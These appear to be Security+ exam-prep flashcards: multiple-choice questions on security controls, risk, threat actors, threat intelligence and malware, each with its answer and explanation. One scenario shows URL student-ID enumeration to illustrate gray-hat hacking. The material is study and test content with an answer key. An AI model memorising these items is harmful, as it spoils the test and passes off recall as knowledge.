End of Chapter Questions Flashcards
Matt is updating the organization’s threat assessment process. What category of control is Matt implementing?
a. Operational
b. Technical
c. Corrective
d. Managerial
D. Managerial controls are procedural mechanisms that focus on the mechanics of the risk management process. Threat assessment is an example of one of these activities.
Jade’s organization recently suffered a security breach that affected stored credit card data. Jade’s primary concern is the fact that the organization is subject to sanctions for violating the provisions of the Payment Card Industry Data Security Standard. What category of risk is concerning Jade?
a. Strategic
b. Compliance
c. Operational
d. Financial
B. The breach of credit card information may cause many different impacts on the organization, including compliance, operational, and financial risks. However, in this scenario, Jade’s primary concern is violating PCI DSS, making his concern a compliance risk.
Chris is responding to a security incident that compromised one of his organization’s web servers. He believes that the attackers defaced one or more pages on the website. What cybersecurity objective did this attack violate?
a. Confidentiality
b. Nonrepudiation
c. Integrity
d. Availability
C. The defacement of a website alters content without authorization and is, therefore, a violation of the integrity objective. The attackers may also have breached the confidentiality or availability of the website, but the scenario does not provide us with enough information to draw those conclusions.
Gwen is exploring a customer transaction reporting system and discovers the table shown here. What type of data minimization has most likely been used on this table?
a. Destruction
b. Masking
c. Tokenization
d. Hashing
B. In this case, the first 12 digits of the credit card have been removed and replaced with asterisks. This is an example of data masking.
Tonya is concerned about the risk that an attacker will attempt to gain access to her organization’s database server. She is searching for a control that would discourage the attacker from attempting to gain access. What type of security control is she seeking to implement?
a. Preventive
b. Detective
c. Corrective
d. Deterrent
D. Deterrent controls are designed to prevent an attacker from attempting to violate security policies in the first place. Preventive controls would attempt to block an attack that was about to take place. Corrective controls would remediate the issues that arose during an attack.
Greg is implementing a data loss prevention system. He would like to ensure that it protects against transmissions of sensitive information by guests on his wireless network. What DLP technology would best meet this goal?
A. Watermarking
B. Pattern recognition
C. Host-based
D. Network-based
D. In this case, Greg must use a network-based DLP system. Host-based DLP requires the use of agents, which would not be installed on guest systems. Greg may use watermarking and/or pattern recognition to identify the sensitive information but he must use network-based DLP to meet his goal.
What term best describes data that is being sent between two systems over a network connection?
A. Data at rest
B. Data in motion
C. Data in processing
D. Data in use
B. Data being sent over a network is data in motion. Data at rest is stored data that resides on hard drives, tapes, in the cloud, or on other storage media. Data in processing, or data in use, is data that is actively in use by a computer system.
Tina is tuning her organization’s intrusion prevention system to prevent false positive alerts. What type of control is Tina implementing?
A. Technical control
B. Physical control
C. Managerial control
D. Operational control
A. Technical controls enforce confidentiality, integrity, and availability in the digital space. Examples of technical security controls include firewall rules, access control lists, intrusion prevention systems, and encryption.
Which one of the following is not a common goal of a cybersecurity attacker?
A. Disclosure
B. Denial
C. Alteration
D. Allocation
D. The three primary goals of cybersecurity attackers are disclosure, alteration, and denial. These map directly to the three objectives of cybersecurity professionals: confidentiality, integrity, and availability
Tony is reviewing the status of his organization’s defenses against a breach of their file server. He believes that a compromise of the file server could reveal information that would prevent the company from continuing to do business. What term best describes the risk that Tony is considering?
A. Strategic
B. Reputational
C. Financial
D. Operational
A. The risk that Tony is contemplating could fit any one of these categories. However, his primary concern is that the company may no longer be able to do business if the risk materializes. This is a strategic risk.
Which one of the following data elements is not commonly associated with identity theft?
A. Social Security number
B. Driver’s license number
C. Frequent flyer number
D. Passport number
C. Although it is possible that a frequent flyer account number, or any other account number for that matter, could be used in identity theft, it is far more likely that identity thieves would use core identity documents. These include drivers’ licenses, passports, and Social Security numbers.
What term best describes an organization’s desired security state?
A. Control objectives
B. Security priorities
C. Strategic goals
D. Best practices
A. As an organization analyzes its risk environment, technical and business leaders determine the level of protection required to preserve the confidentiality, integrity, and availability of their information and systems. They express these requirements by writing the control objectives that the organization wishes to achieve. These control objectives are statements of a desired security state.
Lou mounted the sign below on the fence surrounding his organization’s datacenter. What control type best describes this control?
A. Compensating
B. Detective
C. Physical
D. Deterrent
D. This question is a little tricky. The use of an actual guard dog could be considered a deterrent, physical, or detective control. It could even be a compensating control in some circumstances. However, the question asks about the presence of a sign and does not state that an actual dog is used. The sign only has value as a deterrent control. Be careful when facing exam questions like this to read the details of the question.
What technology uses mathematical algorithms to render information unreadable to those lacking the required key?
A. Data loss prevention
B. Data obfuscation
C. Data minimization
D. Data encryption
D. Encryption technology uses mathematical algorithms to protect information from prying eyes, both while it is in transit over a network and while it resides on systems. Encrypted data is unintelligible to anyone who does not have access to the appropriate decryption key, making it safe to store and transmit encrypted data over otherwise insecure means
Greg recently conducted an assessment of his organization’s security controls and discovered a potential gap: the organization does not use full-disk encryption on laptops. What type of control gap exists in this case?
A. Detective
B. Corrective
C. Deterrent
D. Preventive
D. The use of full-disk encryption is intended to prevent a security incident from occurring if a device is lost or stolen. Therefore, this is a preventive control gap.
What compliance regulation most directly affects the operations of a healthcare provider?
A. HIPAA
B. PCI DSS
C. GLBA
D. SOX
A. Although a health-care provider may be impacted by any of these regulations, the Health Insurance Portability and Accountability Act (HIPAA) provides direct regulations for the security and privacy of protected health information and would have the most direct impact on a health-care provider.
Nolan is writing an after action report on a security breach that took place in his organization. The attackers stole thousands of customer records from the organization’s database. What cybersecurity principle was most impacted in this breach?
A. Availability
B. Nonrepudiation
C. Confidentiality
D. Integrity
C. The disclosure of sensitive information to unauthorized individuals is a violation of the principle of confidentiality.
Which one of the following objectives is not one of the three main objectives that information security professionals must achieve to protect their organizations against cybersecurity threats?
A. Integrity
B. Nonrepudiation
C. Availability
D. Confidentiality
B. The three primary objectives of cybersecurity professionals are confidentiality, integrity, and availability.
Which one of the following data protection techniques is reversible when conducted properly?
A. Tokenization
B. Masking
C. Hashing
D. Shredding
A. Tokenization techniques use a lookup table and are designed to be reversible. Masking and hashing techniques replace the data with values that can’t be reversed back to the original data if performed properly. Shredding, when conducted properly, physically destroys data so that it may not be recovered.
Which one of the following statements is not true about compensating controls under PCI DSS?
A. Controls used to fulfill one PCI DSS requirement may be used to compensate for the absence of a control needed to meet another requirement.
B. Controls must meet the intent of the original requirement.
C. Controls must meet the rigor of the original requirement.
D. Compensating controls must provide a similar level of defense as the original requirement.
A. PCI DSS compensating controls must be “above and beyond” other PCI DSS requirements. This specifically bans the use of a control used to meet one requirement as a compensating control for another requirement.
Which of the following measures is not commonly used to assess threat intelligence?
A. Timeliness
B. Detail
C. Accuracy
D. Relevance
B. Although higher levels of detail can be useful, they aren’t a common measure used to assess threat intelligence. Instead, the timeliness, accuracy, and relevance of the information are considered critical to determining whether you should use the threat information.
What language is STIX based on?
A. PHP
B. HTML
C. XML
D. Python
C. STIX is an XML-based language, allowing it to be easily extended and modified while also using standard XML-based editors, readers, and other tools.
Kolin is a penetration tester who works for a cybersecurity company. His firm was hired to conduct a penetration test against a health-care system, and Kolin is working to gain access to the systems belonging to a hospital in that system. What term best describes Kolin’s work?
A. White hat
B. Gray hat
C. Green hat
D. Black hat
A. Attacks that are conducted as part of an authorized penetration test are white-hat hacking attacks, regardless of whether they are conducted by internal employees or an external firm. Kolin is, therefore, engaged in white-hat hacking. If he were acting on his own, without authorization, his status would depend on his intent. If he had manicous intent, his activity would be considered black-hat hacking. If he simply intended to report vulnerabilities to the hospital, his attack would be considered gray hat. Green hat is not a commonly used category of attacker.
Which one of the following attackers is most likely to be associated with an APT?
A. Nation-state actor
B. Hacktivist
C. Script kiddie
D. Insider
A. Advanced persistent threats (APTs) are most commonly associated with nation-state actors. It is unlikely that an APT group would leverage the unsophisticated services of a script kiddie. It is also unlikely that a hacktivist would have access to APT resources. Although APTs may take advantage of insider access, they are most commonly associated with nation-state actors.
What organizations did the U.S. government help create to help share knowledge between organizations in specific verticals?
A. DHS
B. SANS
C. CERTS
D. ISACs
D. The U.S. government created the Information Sharing and Analysis Centers (ISACs). ISACs help infrastructure owners and operators share threat information, and provide tools and assistance to their members.
Which of the following threat actors typically has the greatest access to resources?
A. Nation-state actors
B. Organized crime
C. Hacktivists
D. Insider threats
A. Nation-state actors are government sponsored, and they typically have the greatest access to resources, including tools, money, and talent.
Of the threat vectors listed here, which one is most commonly exploited by attackers who are at a distant location?
A. Email
B. Direct access
C. Wireless
D. Removable media
A. Email is the most common threat vector exploited by attackers who use phishing and other social engineering tactics to gain access to an organization. The other vectors listed here, direct access, wireless, and removable media, all require physical proximity to an organization and are not easily executed from a remote location.
Which one of the following is the best example of a hacktivist group?
A. Chinese military
B. U.S. government
C. Russian mafia
D. Anonymous
D. The Chinese military and U.S. government are examples of nation-state actors and advanced persistent threats (APTs). The Russian mafia is an example of a criminal syndicate. Anonymous is the world’s most prominent hacktivist group.
What type of assessment is particularly useful for identifying insider threats?
A. Behavioral
B. Instinctual
C. Habitual
D. IOCs
A. Behavioral assessments are very useful when you are attempting to identify insider threats. Since insider threats are often hard to distinguish from normal behavior, the context of the actions performed—such as after-hours logins, misuse of credentials, logins from abnormal locations, or abnormal patterns—and other behavioral indicators are often used.
Cindy wants to send threat information via a standardized protocol specifically designed to exchange cyber threat information. What should she choose?
A. STIX 1.0
B. OpenIOC
C. STIX 2.0
D. TAXII
D. TAXII, the Trusted Automated eXchange of Indicator Information protocol, is specifically designed to communicate cyber threat information at the application layer. OpenIOC is a compromise indicator framework, and STIX is a threat description language.
Greg believes that an attacker may have installed malicious firmware in a network device before it was provided to his organization by the supplier. What type of threat vector best describes this attack?
A. Supply chain
B. Removable media
C. Cloud
D. Direct access
A. Tampering with equipment before it reaches the intended user is an example of a supply chain threat. It is also possible to describe this attack as a direct access attack because it involved physical access to the device, but supply chain is a more relevant answer. You should be prepared to select the best possible choice from several possible correct answers when you take the exam. Security+ questions often use this type of misdirection.
Ken is conducting threat research on Transport Layer Security (TLS) and would like to consult the authoritative reference for the protocol’s technical specification. What resource would best meet his needs?
A. Academic journal
B. Internet RFCs
C. Subject matter experts
D. Textbooks
B. All of these resources might contain information about the technical details of TLS, but Internet Request for Comments (RFC) documents are the definitive technical standards for Internet protocols. Consulting the RFCs would be Ken’s best option.
Wendy is scanning cloud-based repositories for sensitive information. Which one of the following should concern her most, if discovered in a public repository?
A. Product manuals
B. Source code
C. API keys
D. Open source data
C. All of these items could be concerning, depending on the circumstances. However, API keys should never be found in public repositories because they may grant unauthorized individuals access to information and resources.
Which one of the following threat research tools is used to visually display information about the location of threat actors?
A. Threat map
B. Predictive analysis
C. Vulnerability feed
D. STIX
A. Threat maps are graphical tools that display information about the geographic locations of attackers and their targets. These tools are most often used as interesting marketing gimmicks, but they can also help identify possible threat sources.
Vince recently received the hash values of malicious software that several other firms in his industry found installed on their systems after a compromise. What term best describes this information?
A. Vulnerability feed
B. IoC
C. TTP
D. RFC
B. Specific details of attacks that may be used to identify compromises are known as indicators of compromise (IoCs). This data may also be described as an adversary tool, tactic, or procedure (TTP), but the fact that it is a set of file signatures makes it more closely match the definition of an IoC.
Ursula recently discovered that a group of developers are sharing information over a messaging tool provided by a cloud vendor but not sanctioned by her organization. What term best describes this use of technology?
A. Shadow IT
B. System integration
C. Vendor management
D. Data exfiltration
A. The developers in question are using unapproved technology for business purposes. This is the classic definition of shadow IT. It is possible to describe this as data exfiltration, but there is no indication that the data security has been compromised, so shadow IT is a better description here. Remember, you will often be asked to choose the best answer from multiple correct answers on the exam.
Tom’s organization recently learned that the vendor is discontinuing support for their customer relationship management (CRM) system. What should concern Tom the most from a security perspective?
A. Unavailability of future patches
B. Lack of technical support
C. Theft of customer information
D. Increased costs
A. Tom’s greatest concern should be that running unsupported software exposes his organization to the risk of new, unpatchable vulnerabilities. It is certainly true that they will no longer receive technical support, but this is a less important issue from a security perspective. There is no indication in the scenario that discontinuing the product will result in the theft of customer information or increased costs.
Which one of the following information sources would not be considered an OSINT source?
A. DNS lookup
B. Search engine research
C. Port scans
D. WHOIS queries
C. Port scans are an active reconnaissance technique that probe target systems and would not be considered open source intelligence (OSINT). Search engine research, DNS lookups, and WHOIS queries are all open source resources.
Edward Snowden was a government contractor who disclosed sensitive government documents to journalists to uncover what he believed were unethical activities. Which two of the following terms best describe Snowden’s activities? (Choose two.)
A. Insider
B. State actor
C. Hacktivist
D. APT
E. Organized crime
A, C. As a government contractor, Snowden had authorized access to classified information and exploited this access to make an unauthorized disclosure of that information. This clearly makes him fit into the category of an insider. He did so with political motivations, making him fit the category of hacktivist as well.
Renee is a cybersecurity hobbyist. She receives an email about a new web-based grading system being used by her son’s school and she visits the site. She notices that the URL for the site looks like this:
https://www.myschool.edu/grades.php&studentID=1023425
She realizes that 1023425 is her son’s student ID number and she then attempts to access the following similar URLs:
https://www.myschool.edu/grades.php&studentID=1023423
https://www.myschool.edu/grades.php&studentID=1023424
https://www.myschool.edu/grades.php&studentID=1023426
https://www.myschool.edu/grades.php&studentID=1023427
When she does so, she accesses the records of other students. She closes the records and immediately informs the school principal of the vulnerability. What term best describes Renee’s work?
A. White-hat hacking
B. Green-hat hacking
C. Gray-hat hacking
D. Black-hat hacking
C. Renee was not authorized to perform this security testing, so her work does not fit into the category of white-hat hacking. However, she also does not have malicious intent, so her work cannot be categorized as a black-hat attack. Instead, it fits somewhere in between the two extremes and would best be described as gray-hat hacking.
Gurvinder has been asked to assist a company that recently fired one of their developers. After the developer was terminated, the critical application that they had written for the organization stopped working and now displays a message reading “You shouldn’t have fired me!” If the developer’s access was terminated and the organization does not believe that they would have had access to any systems or code after they left the organization, what type of malware should Gurvinder look for?
A. A RAT
B. A PUP
C. A logic bomb
D. A keylogger
C. A logic bomb is a type of malware that activates after specific conditions are met. Here, the developer no longer showing up in payroll, not entering a specific input, or another activation scheme could have been used. A RAT is a remote access Trojan, a PUP is a potentially unwanted program, and a keylogger steals user input.
Naomi believes that an attacker has compromised a Windows workstation using a fileless malware package. What Windows scripting tool was most likely used to download and execute the malware?
A. VBScript
B. Python
C. Bash
D. PowerShell
D. PowerShell is the most likely tool for this type of exploit. VBScript would be used inside an application, and both Bash and Python are more likely to exist on a Linux system.
Scott notices that one of the systems on his network contacted a number of systems via encrypted web traffic, downloaded a handful of files, and then uploaded a large amount of data to a remote system. What type of infection should he look for?
A. A keylogger
B. A backdoor
C. A bot
D. A logic bomb
C. The behaviors that Scott is seeing are characteristic of a bot infection. The bot was likely contacting command-and-control hosts, then downloading updates and/or additional packages, then uploading data from his organization. He will need to determine if sensitive or important business information was present on the system or accessible from it. Keyloggers will capture keystrokes and user input but would typically require additional malware packages to display this behavior. A logic bomb might activate after an event, but no event is described, and a backdoor is used for remote access.
Amanda notices traffic between her systems and a known malicious host on TCP port 6667. What type of traffic is she most likely detecting?
A. Command and control
B. A hijacked web browser
C. A RAT
D. A worm
A. Amanda has most likely discovered a botnet’s command-and- control (C&C) channel, and the system or systems she is monitoring are probably using IRC as the C&C channel. A RAT is more likely to use a different control channel, worms spread by attacking vulnerable services, and a hijacked web browser would probably operate on common HTTP or HTTPS ports (80/443).
Mike discovers that attackers have left software that allows them to have remote access to systems on a computer in his company’s network. How should he describe or classify this malware?
A. A worm
B. Crypto malware
C. A Trojan
D. A backdoor
D. Remote access to a system is typically provided by a backdoor. Backdoors may also appear in firmware or even in hardware. None of the other items listed provide remote access by default, although they may have a backdoor as part of a more capable malware package.
Naomi wants to provide guidance on how to keep her organization’s new machine learning tools secure. Which of the following is not a common means of securing machine learning algorithms?
A. Understand the quality of the source data
B. Build a secure working environment for ML developers
C. Require third-party review for bias in ML algorithms
D. Ensure changes to ML algorithms are reviewed and tested
C. Requiring third-party review of ML algorithms is not a common requirement, but ensuring that you use high-quality source data, that the working environment remains secure, and that changes are reviewed and tested are all common best practices for ML algorithm security.
What type of malware is adware typically classified as?
A. A DOG
B. A backdoor
C. A PUP
D. A rootkit
C. Adware is typically classified as a type of potentially unwanted program, or PUP. Backdoors and rootkits are definitely malicious, whereas adware may simply be unwanted and annoying. A DOG is not a term commonly used to describe malware.
Matt uploads a malware sample to a third-party malware scanning site that uses multiple antimalware and antivirus engines to scan the sample. He receives several different answers for what the malware package is. What has occurred?
A. The package contains more than one piece of malware.
B. The service is misconfigured.
C. The malware is polymorphic and changed while being tested.
D. Different vendors use different names for malware packages.
D. One of the challenges security practitioners can face when attempting to identify malware is that different antivirus and antimalware vendors will name malware packages and families differently. This means that Matt may need to look at different names to figure out what he is dealing with.
Nancy is concerned that there is a software keylogger on the system she is investigating. What data may have been stolen?
A. All files on the system
B. All keyboard input
C. All files the user accessed while the keylogger was active
D. Keyboard and other input from the user
D. Though keyloggers often focus on keyboard input, other types of input may also be captured, meaning Nancy should worry about any user input that occurred while the keylogger was installed. Keyloggers typically do not target files on systems, although if Nancy finds a keylogger she may want to check for other malware packages with additional capabilities.
Crypto malware is a type of what sort of malware?
A. Worms
B. PUP
C. Ransomware
D. Rootkit
C. Crypto malware, a type of ransomware, typically demands payment to decrypt critical files or entire drives. PUPs are potentially unwanted programs like spyware and adware, whereas rootkits are used to gain control of systems without being detected and worms self-spread by exploiting vulnerabilities.
Rick believes that a system he is responsible for has been compromised with malware that uses a rootkit to obtain and retain access to the system. When he runs a virus scan, the system doesn’t show any malware. If he has other data that indicates the system is infected, what should his next step be if he wants to determine what malware may be on the system?
A. Rerun the antimalware scan.
B. Mount the drive on another system and scan it that way.
C. Disable the systems antivirus because it may be causing a false negative.
D. The system is not infected and he should move on.
B. Rootkits are designed to hide from antimalware scanners and can often defeat locally run scans. Mounting the drive in another system in read-only mode, or booting from a USB drive and scanning using a trusted, known good operating system, can be an effective way to determine what malware is on a potentially infected system.
Tracy is concerned about attacks against the machine learning algorithm that her organization is using to assess their network. What step should she take to ensure that her baseline data is not tainted?
A. She should scan all systems on the network for vulnerabilities and remediate them before using the algorithm.
B. She should run the ML algorithm on the network only if she believes it is secure.
C. She should disable outbound and inbound network access so that only normal internal traffic is validated.
D. She should disable all firewall rules so that all potential traffic can be validated.
B. If Tracy is worried about baselining her network and having tainted data, she needs to ensure that no malicious activity is occurring when she runs the baseline data capture. That way, the machine learning algorithm will only be working with normal traffic patterns and behaviors and can then detect and alert on things that are abnormal.
Selah wants to ensure that malware is completely removed from a system. What should she do to ensure this?
A. Run multiple antimalware tools and use them to remove all detections.
B. Wipe the drive and reinstall from known good media.
C. Use the delete setting in her antimalware software rather than the quarantine setting.
D. There is no way to ensure the system is safe and it should be destroyed.
B. In most malware infection scenarios, wiping the drive and reinstalling from known good media is the best option available. If the malware has tools that can infect the system BIOS, even this may not be sufficient, but BIOS-resident malware is relatively uncommon. Multiple antivirus and antimalware tools, even if they are set to delete malware, may still fail against unknown or advanced malware packages. Destroying systems is uncommon and expensive and is unlikely to be acceptable to most organizations as a means of dealing with a malware infection.
What type of malware is frequently called stalkerware because of its use by those in intimate relationships to spy on their partners?
A. Worms
B. RATs
C. Crypto malware
D. PUPs
B. RATs, or remote access Trojans, are sometimes called stalkerware because they are often utilized by those in intimate relationships to spy on their partners. They provide remote access and other capabilities to computers and mobile devices.
Ben wants to analyze Python code that he believes may be malicious code written by an employee of his organization. What can he do to determine if the code is malicious?
A. Run a decompiler against it to allow him to read the code.
B. Open the file using a text editor to review the code.
C. Test the code using an antivirus tool.
D. Submit the Python code to a malware testing website.
B. Python is an interpreted rather than a compiled language, so Ben doesn’t need to use a decompiler. Instead, his best bet is to open the file and review the code to see what it does. Since it was written by an employee, it is unlikely that it will match an existing known malicious package, which means antivirus and antimalware tools and sites will be useless.
What type of malware is VBA code most likely to show up in?
A. Macro viruses
B. RATs
C. Worms
D. Logic bombs
A. Visual Basic for Applications (VBA) code is most likely to show up in macro viruses. VBA is used inside Microsoft Office as a scripting language.